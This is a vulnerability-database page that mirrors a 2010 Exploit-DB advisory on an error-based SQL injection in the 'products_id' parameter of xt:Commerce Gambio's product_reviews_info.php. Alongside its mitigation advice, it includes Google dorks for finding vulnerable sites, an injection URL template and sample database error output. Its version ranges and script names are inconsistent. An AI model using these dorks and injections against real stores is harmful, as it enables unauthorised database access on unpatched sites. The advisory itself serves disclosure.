header-logo
Suggest Exploit
vendor:
xt:Commerce
by:
secret
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: xt:Commerce
Affected Version From: 2006
Affected Version To: 2010
Patch Exists: NO
Related CWE: N/A
CPE: a:gambio:xt:commerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2010

xt:Commerce Gambio 2008 – 2010 ERROR Based SQL Injection ‘reviews.php’

xt:Commerce Gambio 2008 - 2010 is vulnerable to an error based SQL injection vulnerability. This vulnerability exists in the 'product_reviews_info.php' script, which takes the 'products_id' parameter and is not properly sanitized before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be used to bypass authentication and gain access to the admin panel.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

   ________  _____________  / /_
  / ___/ _ \/ ___/ ___/ _ \/ __/
 (__  )  __/ /__/ /  /  __/ /_  
/____/\___/\___/_/   \___/\__/  

# Exploit Title: xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php"
# Date: 2010-09-18
# Author: secret
# Contact : secret_hf@hotmail.com / ICQ : 17-33-77
# Site : swissfaking.net/board
# Software Link: http://www.gambio.de/
# Version: 2006 - 2008 - 2010 - all versions
# Tested on: XP / Linux

# Fixed? : NOT FIXED

# Dorks : Gambio inurl:"reviews.php" / Gambio inurl:"product_reviews.php?products_id=" etc...

##############################################################################################

[ERROR BASED SQL INJECTION]

http://www.xxxxx.com/product_reviews_info.php?products_id=x[SQL INJECTION]

e.g. http://server/product_reviews_info.php?products_id=4[ERROR BASED SQL INECTION]
e.g. http://server/product_reviews_info.php?products_id=4'

->   xtc_db_error ("select manufacturers_id from products where products_id = 4/'", "1064

##############################################################################################

[THANKS TO]

ALLAH - الله لا إله لا ايل

To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION

Navigation

Suggest Exploit

Services By CQR